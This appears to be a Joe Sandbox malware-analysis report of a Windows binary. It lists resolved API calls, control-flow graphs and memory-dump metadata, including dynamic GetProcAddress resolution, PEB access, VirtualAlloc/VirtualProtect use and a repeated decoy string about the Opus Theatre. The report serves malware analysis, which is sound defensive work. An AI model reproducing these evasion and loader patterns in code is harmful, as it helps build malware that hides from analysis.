45898->45899 45900 4016c3 45899->45900 45901 41aab0 lstrcpy 45900->45901 45902 4016d5 45901->45902 45903 41aab0 lstrcpy 45902->45903 45904 4016e7 45903->45904 45905 41aab0 lstrcpy 45904->45905 45906 4015a3 45905->45906 45906->45627 45935 401030 45907->45935 45911 404888 lstrlenA 45938 41ade0 45911->45938 45913 404898 InternetCrackUrlA 45914 4048b7 45913->45914 45914->45704 45916 41aa50 lstrcpy 45915->45916 45917 418d04 45916->45917 45918 41aa50 lstrcpy 45917->45918 45919 418d12 GetSystemTime 45918->45919 45921 418d29 45919->45921 45920 41aab0 lstrcpy 45922 418d8c 45920->45922 45921->45920 45922->45719 45924 41ac41 45923->45924 45925 41ac98 45924->45925 45927 41ac78 lstrcpy lstrcatA 45924->45927 45926 41aab0 lstrcpy 45925->45926 45928 41aca4 45926->45928 45927->45925 45928->45722 45929->45837 45931 40a249 LocalAlloc 45930->45931 45932 404f3e 45930->45932 45931->45932 45933 40a264 CryptStringToBinaryA 45931->45933 45932->45725 45932->45727 45933->45932 45934 40a289 LocalFree 45933->45934 45934->45932 45936 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 45935->45936 45937 41ade0 45936->45937 45937->45911 45938->45913 45939->45847 45940 23f003c 45941 23f0049 45940->45941 45955 23f0e0f SetErrorMode SetErrorMode 45941->45955 45946 23f0265 45947 23f02ce VirtualProtect 45946->45947 45949 23f030b 45947->45949 45948 23f0439 VirtualFree 45950 23f04be 45948->45950 45954 23f05f4 LoadLibraryA 45948->45954 45949->45948 45951 23f04e3 LoadLibraryA 45950->45951 45950->45954 45951->45950 45953 23f08c7 45954->45953 45956 23f0223 45955->45956 45957 23f0d90 45956->45957 45958 23f0dad 45957->45958 45959 23f0dbb GetPEB 45958->45959 45960 23f0238 VirtualAlloc 45958->45960 45959->45960 45960->45946 45961 860000 45964 860006 45961->45964 45965 860015 45964->45965 45968 8607a6 45965->45968 45969 8607c1 45968->45969 45970 8607ca CreateToolhelp32Snapshot 45969->45970 45971 8607e6 Module32First 45969->45971 45970->45969 45970->45971 45972 8607f5 45971->45972 45973 860005 45971->45973 45975 860465 45972->45975 45976 860490 45975->45976 45977 8604a1 VirtualAlloc 45976->45977 45978 8604d9 45976->45978 45977->45978 45978->45978

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 633 419f20-419f2a 634 419f30-41a341 GetProcAddress * 43 633->634 635 41a346-41a3da LoadLibraryA * 8 633->635 634->635 636 41a456-41a45d 635->636 637 41a3dc-41a451 GetProcAddress * 5 635->637 638 41a463-41a521 GetProcAddress * 8 636->638 639 41a526-41a52d 636->639 637->636 638->639 640 41a5a8-41a5af 639->640 641 41a52f-41a5a3 GetProcAddress * 5 639->641 642 41a5b5-41a642 GetProcAddress * 6 640->642 643 41a647-41a64e 640->643 641->640 642->643 644 41a654-41a72a GetProcAddress * 9 643->644 645 41a72f-41a736 643->645 644->645 646 41a7b2-41a7b9 645->646 647 41a738-41a7ad GetProcAddress * 5 645->647 648 41a7bb-41a7e7 GetProcAddress * 2 646->648 649 41a7ec-41a7f3 646->649 647->646 648->649 650 41a825-41a82c 649->650 651 41a7f5-41a820 GetProcAddress * 2 649->651 652 41a922-41a929 650->652 653 41a832-41a91d GetProcAddress * 10 650->653 651->650 654 41a92b-41a988 GetProcAddress * 4 652->654 655 41a98d-41a994 652->655 653->652 654->655 656 41a996-41a9a9 GetProcAddress 655->656 657 41a9ae-41a9b5 655->657 656->657 658 41a9b7-41aa13 GetProcAddress * 4 657->658 659 41aa18-41aa19 657->659 658->659
                                            APIs
                                            • GetProcAddress.KERNEL32(74DD0000,00A65200), ref: 00419F3D
                                            • GetProcAddress.KERNEL32(74DD0000,00A654A0), ref: 00419F55
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C650), ref: 00419F6E
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C680), ref: 00419F86
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C698), ref: 00419F9E
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C638), ref: 00419FB7
                                            • GetProcAddress.KERNEL32(74DD0000,00A69840), ref: 00419FCF
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C608), ref: 00419FE7
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C6C8), ref: 0041A000
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C6B0), ref: 0041A018
                                            • GetProcAddress.KERNEL32(74DD0000,00A6C620), ref: 0041A030
                                            • GetProcAddress.KERNEL32(74DD0000,00A654E0), ref: 0041A049
                                            • GetProcAddress.KERNEL32(74DD0000,00A651A0), ref: 0041A061
                                            • GetProcAddress.KERNEL32(74DD0000,00A651C0), ref: 0041A079
                                            • GetProcAddress.KERNEL32(74DD0000,00A65540), ref: 0041A092
                                            • GetProcAddress.KERNEL32(74DD0000,00A70670), ref: 0041A0AA
                                            • GetProcAddress.KERNEL32(74DD0000,00A70538), ref: 0041A0C2
                                            • GetProcAddress.KERNEL32(74DD0000,00A698B8), ref: 0041A0DB
                                            • GetProcAddress.KERNEL32(74DD0000,00A651E0), ref: 0041A0F3
                                            • GetProcAddress.KERNEL32(74DD0000,00A70658), ref: 0041A10B
                                            • GetProcAddress.KERNEL32(74DD0000,00A70700), ref: 0041A124
                                            • GetProcAddress.KERNEL32(74DD0000,00A70550), ref: 0041A13C
                                            • GetProcAddress.KERNEL32(74DD0000,00A70640), ref: 0041A154
                                            • GetProcAddress.KERNEL32(74DD0000,00A65240), ref: 0041A16D
                                            • GetProcAddress.KERNEL32(74DD0000,00A70508), ref: 0041A185
                                            • GetProcAddress.KERNEL32(74DD0000,00A705F8), ref: 0041A19D
                                            • GetProcAddress.KERNEL32(74DD0000,00A70778), ref: 0041A1B6
                                            • GetProcAddress.KERNEL32(74DD0000,00A70790), ref: 0041A1CE
                                            • GetProcAddress.KERNEL32(74DD0000,00A70580), ref: 0041A1E6
                                            • GetProcAddress.KERNEL32(74DD0000,00A706E8), ref: 0041A1FF
                                            • GetProcAddress.KERNEL32(74DD0000,00A70718), ref: 0041A217
                                            • GetProcAddress.KERNEL32(74DD0000,00A705E0), ref: 0041A22F
                                            • GetProcAddress.KERNEL32(74DD0000,00A706B8), ref: 0041A248
                                            • GetProcAddress.KERNEL32(74DD0000,00A694C0), ref: 0041A260
                                            • GetProcAddress.KERNEL32(74DD0000,00A70730), ref: 0041A278
                                            • GetProcAddress.KERNEL32(74DD0000,00A70628), ref: 0041A291
                                            • GetProcAddress.KERNEL32(74DD0000,00A65260), ref: 0041A2A9
                                            • GetProcAddress.KERNEL32(74DD0000,00A704C0), ref: 0041A2C1
                                            • GetProcAddress.KERNEL32(74DD0000,00A65280), ref: 0041A2DA
                                            • GetProcAddress.KERNEL32(74DD0000,00A707A8), ref: 0041A2F2
                                            • GetProcAddress.KERNEL32(74DD0000,00A70520), ref: 0041A30A
                                            • GetProcAddress.KERNEL32(74DD0000,00A652C0), ref: 0041A323
                                            • GetProcAddress.KERNEL32(74DD0000,00A652A0), ref: 0041A33B
                                            • LoadLibraryA.KERNEL32(00A704D8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
                                            • LoadLibraryA.KERNEL32(00A70688,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
                                            • LoadLibraryA.KERNEL32(00A704F0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
                                            • LoadLibraryA.KERNEL32(00A70568,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
                                            • LoadLibraryA.KERNEL32(00A70748,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
                                            • LoadLibraryA.KERNEL32(00A705B0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
                                            • LoadLibraryA.KERNEL32(00A70760,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
                                            • LoadLibraryA.KERNEL32(00A70598,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
                                            • GetProcAddress.KERNEL32(75290000,00A652E0), ref: 0041A3EA
                                            • GetProcAddress.KERNEL32(75290000,00A705C8), ref: 0041A402
                                            • GetProcAddress.KERNEL32(75290000,00A6DD00), ref: 0041A41A
                                            • GetProcAddress.KERNEL32(75290000,00A70610), ref: 0041A433
                                            • GetProcAddress.KERNEL32(75290000,00A65600), ref: 0041A44B
                                            • GetProcAddress.KERNEL32(73440000,00A698E0), ref: 0041A470
                                            • GetProcAddress.KERNEL32(73440000,00A657E0), ref: 0041A489
                                            • GetProcAddress.KERNEL32(73440000,00A69700), ref: 0041A4A1
                                            • GetProcAddress.KERNEL32(73440000,00A706A0), ref: 0041A4B9
                                            • GetProcAddress.KERNEL32(73440000,00A706D0), ref: 0041A4D2
                                            • GetProcAddress.KERNEL32(73440000,00A65620), ref: 0041A4EA
                                            • GetProcAddress.KERNEL32(73440000,00A65640), ref: 0041A502
                                            • GetProcAddress.KERNEL32(73440000,00A707C0), ref: 0041A51B
                                            • GetProcAddress.KERNEL32(752C0000,00A658C0), ref: 0041A53C
                                            • GetProcAddress.KERNEL32(752C0000,00A656A0), ref: 0041A554
                                            • GetProcAddress.KERNEL32(752C0000,00A707F0), ref: 0041A56D
                                            • GetProcAddress.KERNEL32(752C0000,00A70838), ref: 0041A585
                                            • GetProcAddress.KERNEL32(752C0000,00A655C0), ref: 0041A59D
                                            • GetProcAddress.KERNEL32(74EC0000,00A69750), ref: 0041A5C3
                                            • GetProcAddress.KERNEL32(74EC0000,00A69958), ref: 0041A5DB
                                            • GetProcAddress.KERNEL32(74EC0000,00A70808), ref: 0041A5F3
                                            • GetProcAddress.KERNEL32(74EC0000,00A65800), ref: 0041A60C
                                            • GetProcAddress.KERNEL32(74EC0000,00A65820), ref: 0041A624
                                            • GetProcAddress.KERNEL32(74EC0000,00A69980), ref: 0041A63C
                                            • GetProcAddress.KERNEL32(75BD0000,00A70868), ref: 0041A662
                                            • GetProcAddress.KERNEL32(75BD0000,00A65760), ref: 0041A67A
                                            • GetProcAddress.KERNEL32(75BD0000,00A6DC00), ref: 0041A692
                                            • GetProcAddress.KERNEL32(75BD0000,00A70850), ref: 0041A6AB
                                            • GetProcAddress.KERNEL32(75BD0000,00A70880), ref: 0041A6C3
                                            • GetProcAddress.KERNEL32(75BD0000,00A656E0), ref: 0041A6DB
                                            • GetProcAddress.KERNEL32(75BD0000,00A658E0), ref: 0041A6F4
                                            • GetProcAddress.KERNEL32(75BD0000,00A70820), ref: 0041A70C
                                            • GetProcAddress.KERNEL32(75BD0000,00A707D8), ref: 0041A724
                                            • GetProcAddress.KERNEL32(75A70000,00A65880), ref: 0041A746
                                            • GetProcAddress.KERNEL32(75A70000,00A70C58), ref: 0041A75E
                                            • GetProcAddress.KERNEL32(75A70000,00A70CA0), ref: 0041A776
                                            • GetProcAddress.KERNEL32(75A70000,00A70CE8), ref: 0041A78F
                                            • GetProcAddress.KERNEL32(75A70000,00A70CB8), ref: 0041A7A7
                                            • GetProcAddress.KERNEL32(75450000,00A658A0), ref: 0041A7C8
                                            • GetProcAddress.KERNEL32(75450000,00A65680), ref: 0041A7E1
                                            • GetProcAddress.KERNEL32(75DA0000,00A65660), ref: 0041A802
                                            • GetProcAddress.KERNEL32(75DA0000,00A70D78), ref: 0041A81A
                                            • GetProcAddress.KERNEL32(6F070000,00A65740), ref: 0041A840
                                            • GetProcAddress.KERNEL32(6F070000,00A657A0), ref: 0041A858
                                            • GetProcAddress.KERNEL32(6F070000,00A65900), ref: 0041A870
                                            • GetProcAddress.KERNEL32(6F070000,00A70C10), ref: 0041A889
                                            • GetProcAddress.KERNEL32(6F070000,00A65840), ref: 0041A8A1
                                            • GetProcAddress.KERNEL32(6F070000,00A65700), ref: 0041A8B9
                                            • GetProcAddress.KERNEL32(6F070000,00A65860), ref: 0041A8D2
                                            • GetProcAddress.KERNEL32(6F070000,00A65920), ref: 0041A8EA
                                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A901
                                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A917
                                            • GetProcAddress.KERNEL32(75AF0000,00A70C88), ref: 0041A939
                                            • GetProcAddress.KERNEL32(75AF0000,00A6DC60), ref: 0041A951
                                            • GetProcAddress.KERNEL32(75AF0000,00A70BF8), ref: 0041A969
                                            • GetProcAddress.KERNEL32(75AF0000,00A70E20), ref: 0041A982
                                            • GetProcAddress.KERNEL32(75D90000,00A65720), ref: 0041A9A3
                                            • GetProcAddress.KERNEL32(6E3B0000,00A70E08), ref: 0041A9C4
                                            • GetProcAddress.KERNEL32(6E3B0000,00A65940), ref: 0041A9DD
                                            • GetProcAddress.KERNEL32(6E3B0000,00A70BC8), ref: 0041A9F5
                                            • GetProcAddress.KERNEL32(6E3B0000,00A70DF0), ref: 0041AA0D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: HttpQueryInfoA$InternetSetOptionA
                                            • API String ID: 2238633743-1775429166
                                            • Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                            • Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
                                            • Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                            • Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62

                                            Control-flow Graph

                                            APIs
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
                                            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
                                            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
                                            • strlen.MSVCRT ref: 00404740
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
                                            Strings
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo 